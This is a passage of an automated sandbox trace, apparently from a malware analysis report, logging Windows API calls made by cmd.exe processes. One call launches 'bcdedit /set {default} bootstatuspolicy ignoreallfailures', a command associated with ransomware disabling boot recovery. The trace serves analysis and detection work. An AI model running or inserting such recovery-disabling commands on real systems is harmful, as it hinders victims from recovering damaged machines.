RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fcad0) returned 0x12a [0046.278] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x2fcc10 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fcc10, Size=0x7e) returned 0x2fcc10 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fcc10) returned 0x7e [0046.279] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.279] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x22ee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee50) returned 0xffffffffffffffff [0046.279] GetLastError () returned 0x2 [0046.279] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x22ee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee50) returned 0xffffffffffffffff [0046.279] GetLastError () returned 0x2 [0046.279] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.279] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x22ee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee50) returned 0x2e1d80 [0046.279] FindClose (in: hFindFile=0x2e1d80 | out: hFindFile=0x2e1d80) returned 1 [0046.279] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x22ee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee50) returned 0xffffffffffffffff [0046.279] GetLastError () returned 0x2 [0046.279] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee50) returned 0x2e1d80 [0046.280] FindClose (in: hFindFile=0x2e1d80 | out: hFindFile=0x2e1d80) returned 1 [0046.280] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0046.280] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0046.280] GetConsoleTitleW (in: lpConsoleTitle=0x22f3a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.290] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f158, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f118 | out: lpAttributeList=0x22f158, lpSize=0x22f118) returned 1 [0046.290] UpdateProcThreadAttribute (in: lpAttributeList=0x22f158, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f108, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f158, lpPreviousValue=0x0) returned 1 [0046.290] GetStartupInfoW (in: lpStartupInfo=0x22f270 | out: lpStartupInfo=0x22f270*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0046.290] GetProcessHeap () returned 0x2e0000 [0046.290] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2e13e0 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0046.291] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.292] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.292] GetProcessHeap () returned 0x2e0000 [0046.292] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e13e0 | out: hHeap=0x2e0000) returned 1 [0046.292] GetProcessHeap () returned 0x2e0000 [0046.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2fa080 [0046.292] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0046.292] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x22f190*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f140 | out: lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x22f140*(hProcess=0x58, hThread=0x54, dwProcessId=0x684, dwThreadId=0x314)) returned 1 [0046.411] CloseHandle (hObject=0x54) returned 1 [0046.411] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0046.411] GetProcessHeap () returned 0x2e0000 [0046.411] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb9c0 | out: hHeap=0x2e0000) returned 1 [0046.411] GetEnvironmentStringsW () returned 0x2faed0* [0046.411] GetProcessHeap () returned 0x2e0000 [0046.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xae8) returned 0x2fb9c0 [0046.411] FreeEnvironmentStringsW (penv=0x2faed0) returned 1 [0046.411] GetProcessHeap () returned 0x2e0000 [0046.411] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fa080 | out: hHeap=0x2e0000) returned 1 [0046.411] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f158 | out: lpAttributeList=0x22f158) [0046.411] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0046.411] _close (_FileHandle=4) returned 0 [0046.412] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0047.369] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x22f678 | out: lpExitCode=0x22f678*=0x0) returned 1 [0047.369] CloseHandle (hObject=0x60) returned 1 [0047.369] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0047.608] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x22f678 | out: lpExitCode=0x22f678*=0x0) returned 1 [0047.608] CloseHandle (hObject=0x58) returned 1 [0047.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.608] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0047.609] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.609] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 1 [0047.609] _get_osfhandle (_FileHandle=0) returned 0x3 [0047.609] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0047.609] SetConsoleInputExeNameW () returned 0x1 [0047.609] GetConsoleOutputCP () returned 0x1b5 [0047.609] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0047.609] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0047.609] exit (_Code=0) Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x19b44000" os_pid = "0x4f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xb70" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6037086\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 18 os_tid = 0x65c [0046.366] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f750 | out: lpSystemTimeAsFileTime=0x16f750*(dwLowDateTime=0x1a860200, dwHighDateTime=0x1d5e3d9)) [0046.366] GetCurrentProcessId () returned 0x4f4 [0046.366] GetCurrentThreadId () returned 0x65c [0046.366] GetTickCount () returned 0x1156597 [0046.366] QueryPerformanceCounter (in: lpPerformanceCount=0x16f758 | out: lpPerformanceCount=0x16f758*=18828847383) returned 1 [0046.368] GetModuleHandleW (lpModuleName=0x0) returned 0x49eb0000 [0046.368] __set_app_type (_Type=0x1) [0046.368] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ed7810) returned 0x0 [0046.368] __getmainargs (in: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610, _DoWildCard=0, _StartInfo=0x49ede0f4 | out: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610) returned 0 [0046.368] GetCurrentThreadId () returned 0x65c [0046.368] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x65c) returned 0x38 [0046.368] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.368] GetProcAddress (hModule=0x76f20000, lpProcName="SetThreadUILanguage") returned 0x76f36d40 [0046.368] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.562] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.562] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f6e8 | out: phkResult=0x16f6e8*=0x0) returned 0x2 [0046.563] VirtualQuery (in: lpAddress=0x16f6d0, lpBuffer=0x16f650, dwLength=0x30 | out: lpBuffer=0x16f650*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.563] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f650, dwLength=0x30 | out: lpBuffer=0x16f650*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.563] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f650, dwLength=0x30 | out: lpBuffer=0x16f650*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.563] VirtualQuery (in: lpAddress=0x74000, lpBuffer=0x16f650, dwLength=0x30 | out: lpBuffer=0x16f650*(BaseAddress=0x74000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.563] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f650, dwLength=0x30 | out: lpBuffer=0x16f650*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0046.563] GetConsoleOutputCP () returned 0x1b5 [0046.563] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.563] SetConsoleCtrlHandler (HandlerRoutine=0x49ed3184, Add=1) returned 1 [0046.563] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.563] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0046.563] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.563] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 0 [0046.564] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.564] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0046.564] GetEnvironmentStringsW () returned 0x2c8b30* [0046.564] GetProcessHeap () returned 0x2b0000 [0046.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xae8) returned 0x2c9620 [0046.564] FreeEnvironmentStringsW (penv=0x2c8b30) returned 1 [0046.564] GetProcessHeap () returned 0x2b0000 [0046.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2c83b0 [0046.564] GetEnvironmentStringsW () returned 0x2c8b30* [0046.564] GetProcessHeap () returned 0x2b0000 [0046.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xae8) returned 0x2ca110 [0046.564] FreeEnvironmentStringsW (penv=0x2c8b30) returned 1 [0046.564] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e5a8 | out: phkResult=0x16e5a8*=0x40) returned 0x0 [0046.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x0, lpData=0x16e5c0*=0x18, lpcbData=0x16e5a4*=0x1000) returned 0x2 [0046.564] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x4, lpData=0x16e5c0*=0x1, lpcbData=0x16e5a4*=0x4) returned 0x0 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x0, lpData=0x16e5c0*=0x1, lpcbData=0x16e5a4*=0x1000) returned 0x2 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x4, lpData=0x16e5c0*=0x0, lpcbData=0x16e5a4*=0x4) returned 0x0 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x4, lpData=0x16e5c0*=0x40, lpcbData=0x16e5a4*=0x4) returned 0x0 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x4, lpData=0x16e5c0*=0x40, lpcbData=0x16e5a4*=0x4) returned 0x0 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x0, lpData=0x16e5c0*=0x40, lpcbData=0x16e5a4*=0x1000) returned 0x2 [0046.565] RegCloseKey (hKey=0x40) returned 0x0 [0046.565] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e5a8 | out: phkResult=0x16e5a8*=0x40) returned 0x0 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x0, lpData=0x16e5c0*=0x40, lpcbData=0x16e5a4*=0x1000) returned 0x2 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x4, lpData=0x16e5c0*=0x1, lpcbData=0x16e5a4*=0x4) returned 0x0 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x0, lpData=0x16e5c0*=0x1, lpcbData=0x16e5a4*=0x1000) returned 0x2 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x4, lpData=0x16e5c0*=0x0, lpcbData=0x16e5a4*=0x4) returned 0x0 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x4, lpData=0x16e5c0*=0x9, lpcbData=0x16e5a4*=0x4) returned 0x0 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x4, lpData=0x16e5c0*=0x9, lpcbData=0x16e5a4*=0x4) returned 0x0 [0046.565] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e5a0, lpData=0x16e5c0, lpcbData=0x16e5a4*=0x1000 | out: lpType=0x16e5a0*=0x0, lpData=0x16e5c0*=0x9, lpcbData=0x16e5a4*=0x1000) returned 0x2 [0046.565] RegCloseKey (hKey=0x40) returned 0x0 [0046.565] time (in: timer=0x0 | out: timer=0x0) returned 0x5e47aa57 [0046.565] srand (_Seed=0x5e47aa57) [0046.565] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6037086\"" [0046.565] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6037086\"" [0046.565] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.566] GetProcessHeap () returned 0x2b0000 [0046.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x218) returned 0x2cac00 [0046.566] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cac10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0046.566] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.566] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.566] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0046.566] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.566] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.566] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0046.566] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0046.566] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0046.566] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0046.566] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0046.566] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0046.566] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0046.566] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0046.566] GetProcessHeap () returned 0x2b0000 [0046.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x5c) returned 0x2cae20 [0046.566] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f3b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.566] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x16f3b0, lpFilePart=0x16f390 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f390*="Desktop") returned 0x25 [0046.566] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.566] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f0c0 | out: lpFindFileData=0x16f0c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x2c8990 [0046.567] FindClose (in: hFindFile=0x2c8990 | out: hFindFile=0x2c8990) returned 1 [0046.567] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16f0c0 | out: lpFindFileData=0x16f0c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2c8990 [0046.567] FindClose (in: hFindFile=0x2c8990 | out: hFindFile=0x2c8990) returned 1 [0046.567] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0046.567] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16f0c0 | out: lpFindFileData=0x16f0c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x13408ec0, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0x13408ec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x2c8990 [0046.567] FindClose (in: hFindFile=0x2c8990 | out: hFindFile=0x2c8990) returned 1 [0046.567] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.567] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0046.567] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0046.567] GetProcessHeap () returned 0x2b0000 [0046.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c9620 | out: hHeap=0x2b0000) returned 1 [0046.567] GetEnvironmentStringsW () returned 0x2c8b30* [0046.567] 